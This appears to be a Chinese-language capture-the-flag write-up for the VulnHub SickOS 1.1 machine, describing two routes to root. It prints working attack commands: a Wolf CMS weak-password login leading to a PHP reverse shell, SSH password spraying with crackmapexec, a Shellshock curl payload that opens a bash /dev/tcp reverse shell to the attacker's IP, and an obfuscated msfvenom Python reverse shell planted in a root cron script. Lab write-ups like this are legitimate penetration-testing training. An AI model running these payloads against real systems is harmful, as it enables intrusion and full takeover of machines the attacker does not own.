SICKOS: 1.1
https://www.vulnhub.com/entry/sickos-11,132/
第一种解法
主机发现
# yunki @ yunki in ~ [9:39:12]
$ sudo nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.12
Host is up (0.00034s latency).
nmap扫描
# yunki @ yunki in ~ [9:39:19]
$ sudo nmap --min-rate 10000 -p- 192.168.54.12
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:18:0D:37 (VMware)
# yunki @ yunki in ~ [9:39:43]
$ sudo nmap -sT -sV -O -p22,3128,8080 192.168.54.12
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
MAC Address: 00:0C:29:18:0D:37 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# yunki @ yunki in ~ [9:40:34]
$ sudo nmap -sU -p22,3128,8080 192.168.54.12
PORT STATE SERVICE
22/udp open|filtered ssh
3128/udp open|filtered ndl-aas
8080/udp open|filtered http-alt
MAC Address: 00:0C:29:18:0D:37 (VMware)
# yunki @ yunki in ~ [9:40:57]
$ sudo nmap --script=vuln -p22,3128,8080 192.168.54.12
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:18:0D:37 (VMware)
web渗透
通过搜索,发现3128端口是负责代理的。
目录扫描
先扫80,扫不到任何东西;扫3128,也扫不到任何东西,那就把3128做代理扫描80端口,扫描到几个文件,一一查看。
# yunki @ yunki in ~/vulnhub/sickos1 [9:48:53]
$ dirb http://192.168.54.12
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Mar 18 09:48:59 2023
URL_BASE: http://192.168.54.12/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.54.12/ ----
*** Calculating NOT_FOUND code...
^C
# yunki @ yunki in ~/vulnhub/sickos1 [9:50:57] C:130
$ dirb http://192.168.54.12:3128
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Mar 18 09:51:00 2023
URL_BASE: http://192.168.54.12:3128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.54.12:3128/ ----
-----------------
END_TIME: Sat Mar 18 09:51:15 2023
DOWNLOADED: 4612 - FOUND: 0
# yunki @ yunki in ~/vulnhub/sickos1 [9:51:15]
$ dirb http://192.168.54.12 -p http://192.168.54.12:3128
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Mar 18 09:51:37 2023
URL_BASE: http://192.168.54.12/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.54.12:3128
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.54.12/ ----
+ http://192.168.54.12/cgi-bin/ (CODE:403|SIZE:289)
+ http://192.168.54.12/connect (CODE:200|SIZE:109)
+ http://192.168.54.12/index (CODE:200|SIZE:21)
+ http://192.168.54.12/index.php (CODE:200|SIZE:21)
+ http://192.168.54.12/robots (CODE:200|SIZE:45)
+ http://192.168.54.12/robots.txt (CODE:200|SIZE:45)
+ http://192.168.54.12/server-status (CODE:403|SIZE:294)
-----------------
END_TIME: Sat Mar 18 09:51:41 2023
DOWNLOADED: 4612 - FOUND: 7
发现一个robots文件,这里打开wolfcms
看看。阅读一下cms。没发现有用的信息。
# yunki @ yunki in ~/vulnhub/sickos1 [9:55:18]
$ gobuster dir --url http://192.168.54.12/wolfcms/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --proxy http://192.168.54.12:3128
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.12/wolfcms/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Proxy: http://192.168.54.12:3128
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/03/18 10:01:44 Starting gobuster in directory enumeration mode
===============================================================
/docs (Status: 301) [Size: 321] [--> http://192.168.54.12/wolfcms/docs/]
/index (Status: 200) [Size: 3975]
/public (Status: 301) [Size: 323] [--> http://192.168.54.12/wolfcms/public/]
/config (Status: 200) [Size: 0]
/favicon (Status: 200) [Size: 894]
/robots (Status: 200) [Size: 0]
/wolf (Status: 301) [Size: 321] [--> http://192.168.54.12/wolfcms/wolf/]
/composer (Status: 200) [Size: 403]
===============================================================
2023/03/18 10:04:05 Finished
===============================================================
目录扫描一下。没扫到啥有用的信息,但是博客肯定有后台呀,这里没有搜到,去网上去搜搜。
成功找到!但是通过阅读博客,没有啥信息,web上也不到默认用户和密码。尝试弱密码,admin,root,password,administrator,结果居然成功了。admin:admin
就是用户密码。
发现可以编辑php代码,直接写入反弹shell,go。写入,保存,监听,访问,一气呵成。获得shell。
获得初始shell
kali
# yunki @ yunki in ~/vulnhub/sickos1 [10:31:29]
$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.12] 48817
whoami
www-data
uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
uname -r
3.11.0-15-generic
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:0c:29:18:0d:37 brd ff:ff:ff:ff:ff:ff
inet 192.168.54.12/24 brd 192.168.54.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe18:d37/64 scope link
valid_lft forever preferred_lft forever
提权
通过阅读web目录下的文件,发现了数据库连接文件,发现到一个密码。
登录到mysql,并没有发什么有用的信息。那这个密码还有没有其他的用处呢。这里看一下系统有哪些用户。
www-data@SickOs:/var/www/wolfcms$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
写到文件里,尝试用crackmapexec去爆破ssh登录试试看,密码就用john@123
。
# yunki @ yunki in ~/vulnhub/sickos1 [10:48:32]
$ crackmapexec ssh 192.168.54.12 -u username.txt -p john@123 --continue-on-success | grep "+"
/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
"class": algorithms.Blowfish,
SSH 192.168.54.12 22 192.168.54.12 [+] sickos:john@123
发现`sickos:john@123``是正确的,那就去ssh登录。
# yunki @ yunki in ~/vulnhub/sickos1 [10:50:32] C:1
$ ssh sickos@192.168.54.12
The authenticity of host '192.168.54.12 (192.168.54.12)' can't be established.
ECDSA key fingerprint is SHA256:fBxcsD9oGyzCgdxtn34OtTEDXIW4E9/RlkxombNm0y8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.54.12' (ECDSA) to the list of known hosts.
sickos@192.168.54.12's password:
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Sat Mar 18 08:20:46 IST 2023
System load: 0.0 Processes: 119
Usage of /: 4.7% of 28.42GB Users logged in: 0
Memory usage: 12% IP address for eth0: 192.168.54.12
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
124 packages can be updated.
92 updates are security updates.
New release '14.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Tue Sep 22 08:32:44 2015
sickos@SickOs:~$ whoami
sickos
sickos@SickOs:~$ uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
进一步提权
sickos@SickOs:~$ sudo -l
[sudo] password for sickos:
Matching Defaults entries for sickos on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sickos may run the following commands on this host:
(ALL : ALL) ALL
sickos@SickOs:~$ sudo /bin/bash
root@SickOs:~# whoami
root
root@SickOs:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:0c:29:18:0d:37 brd ff:ff:ff:ff:ff:ff
inet 192.168.54.12/24 brd 192.168.54.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe18:d37/64 scope link
valid_lft forever preferred_lft forever
第二种解法
前面同解法一,这里用Nikto重新扫描一下。
# yunki @ yunki in ~/vulnhub/sickos1 [10:54:50]
$ sudo nikto -h 192.168.54.12 -useproxy http://192.168.54.12:3128
[sudo] yunki 的密码:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.54.12
+ Target Hostname: 192.168.54.12
+ Target Port: 80
+ Proxy: 192.168.54.12:3128
+ Start Time: 2023-03-18 10:55:27 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Sat Dec 5 08:35:02 2015
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header '93e4r0-cve-2014-6278' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ 8726 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2023-03-18 10:56:11 (GMT8) (44 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
这里发现有个/cgi-bin/status
漏洞,这里可以使用shellshock进行攻击。
利用shellshock getshell
shellshock验证
# yunki @ yunki in ~/vulnhub/sickos1 [11:00:14]
$ sudo curl -v --proxy http://192.168.54.12:3128 http://192.168.54.12/cgi-bin/status -H "Referer:() { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id; exit"
* Trying 192.168.54.12:3128...
* Connected to 192.168.54.12 (192.168.54.12) port 3128 (#0)
> GET http://192.168.54.12/cgi-bin/status HTTP/1.1
> Host: 192.168.54.12
> User-Agent: curl/7.74.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Referer:() { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id; exit
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Date: Sat, 18 Mar 2023 03:02:47 GMT
< Server: Apache/2.2.22 (Ubuntu)
< Vary: Accept-Encoding
< Content-Type: text/plain
< X-Cache: MISS from localhost
< X-Cache-Lookup: MISS from localhost:3128
< Via: 1.0 localhost (squid/3.1.19)
< Connection: close
<
uid=33(www-data) gid=33(www-data) groups=33(www-data)
* Closing connection 0
存在shellshock漏洞。
shellshock利用
构造payload
# yunki @ yunki in ~ [11:04:17]
$ sudo msfvenom -p cmd/unix/reverse_bash lhost=192.168.54.128 lport=443 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 72 bytes
bash -c '0<&78-;exec 78<>/dev/tcp/192.168.54.128/443;sh <&78 >&78 2>&78'
第一次shellshock
# yunki @ yunki in ~/vulnhub/sickos1 [11:09:16]
$ sudo curl --proxy http://192.168.54.12:3128 http://192.168.54.12/cgi-bin/status -H "Referer:() { test;}; 0<&78-;exec 78<>/dev/tcp/192.168.54.128/443;sh <&78 >&78 2>&78"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
webmaster@localhost and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.2.22 (Ubuntu) Server at 192.168.54.12 Port 80</address>
</body></html>
# yunki @ yunki in ~ [11:09:19]
$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.12] 48917
/bin/bash: sh: No such file or directory
他没有配置sh,这里改成/bin/bash再试试
# yunki @ yunki in ~/vulnhub/sickos1 [11:09:25]
$ sudo curl --proxy http://192.168.54.12:3128 http://192.168.54.12/cgi-bin/status -H "Referer:() { test;}; 0<&78-;exec 78<>/dev/tcp/192.168.54.128/443;/bin/bash <&78 >&78 2>&78"
获得初始权限
# yunki @ yunki in ~ [11:09:25]
$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.12] 48919
whoami
www-data
提权
www-data@SickOs:/usr/lib/cgi-bin$ uname -a
uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
www-data@SickOs:/usr/lib/cgi-bin$ uname -r
uname -r
3.11.0-15-generic
www-data@SickOs:/var/www$ cat connect.py
cat connect.py
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"
难道是定时任务?去看看。
www-data@SickOs:/etc$ ls -liah | grep "cron"
ls -liah | grep "cron"
131439 drwxr-xr-x 2 root root 4.0K Dec 5 2015 cron.d
131120 drwxr-xr-x 2 root root 4.0K Sep 22 2015 cron.daily
131443 drwxr-xr-x 2 root root 4.0K Sep 22 2015 cron.hourly
131431 drwxr-xr-x 2 root root 4.0K Sep 22 2015 cron.monthly
131433 drwxr-xr-x 2 root root 4.0K Sep 22 2015 cron.weekly
131437 -rw-r--r-- 1 root root 722 Jun 20 2012 crontab
www-data@SickOs:/etc$ cat crontab
cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@SickOs:/etc$ cd cron.d
cd cron.d
www-data@SickOs:/etc/cron.d$ ls
ls
automate php5
www-data@SickOs:/etc/cron.d$ cat automate
cat automate
* * * * * root /usr/bin/python /var/www/connect.py
原来是定时执行connect.py文件,那就构造个反弹shell,写入文件中。
# yunki @ yunki in ~ [11:15:20]
$ sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.54.128 lport=444 -f raw
[sudo] yunki 的密码:
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 364 bytes
python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkEELwjAMhf9K6akDqbZUmUgPQyaIqOB2H65WNpxtWbr/r6MTe1wuIS9f3oO0b2d7j8Cql/boWwsEQ+16qzRAmC2gHfpVY8FLzLacsk1K14IynuJoP7pJIUQkgQzuNDQyTdmhOl7ycsoMWnHdn6qivOXZOYkdqLLGaOUJGfPDyZiUxJQF+hgcJ0CfbaeNJUkAV3MgNgfiMeTk/1FU3buO4GXdmiU0OPkAk8JZjQ==')[0])))"
开启监听,然后将payload写入connect.py
www-data@SickOs:/etc/cron.d$ echo "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkEELwjAMhf9K6akDqbZUmUgPQyaIqOB2H65WNpxtWbr/r6MTe1wuIS9f3oO0b2d7j8Cql/boWwsEQ+16qzRAmC2gHfpVY8FLzLacsk1K14IynuJoP7pJIUQkgQzuNDQyTdmhOl7ycsoMWnHdn6qivOXZOYkdqLLGaOUJGfPDyZiUxJQF+hgcJ0CfbaeNJUkAV3MgNgfiMeTk/1FU3buO4GXdmiU0OPkAk8JZjQ==')[0])))" >> /var/www/connect.py
/connect.pybaeNJUkAV3MgNgfiMeTk/1FU3buO4GXdmiU0OPkAk8JZjQ==')[0])))" >> /var/www
www-data@SickOs:/etc/cron.d$ cat /var/www/connect.py
cat /var/www/connect.py
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"
exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkEELwjAMhf9K6akDqbZUmUgPQyaIqOB2H65WNpxtWbr/r6MTe1wuIS9f3oO0b2d7j8Cql/boWwsEQ+16qzRAmC2gHfpVY8FLzLacsk1K14IynuJoP7pJIUQkgQzuNDQyTdmhOl7ycsoMWnHdn6qivOXZOYkdqLLGaOUJGfPDyZiUxJQF+hgcJ0CfbaeNJUkAV3MgNgfiMeTk/1FU3buO4GXdmiU0OPkAk8JZjQ==')[0])))
喝杯咖啡,等待一会。
# yunki @ yunki in ~ [11:25:15]
$ nc -lvnp 444
listening on [any] 444 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.12] 38154
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:0c:29:18:0d:37 brd ff:ff:ff:ff:ff:ff
inet 192.168.54.12/24 brd 192.168.54.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe18:d37/64 scope link
valid_lft forever preferred_lft forever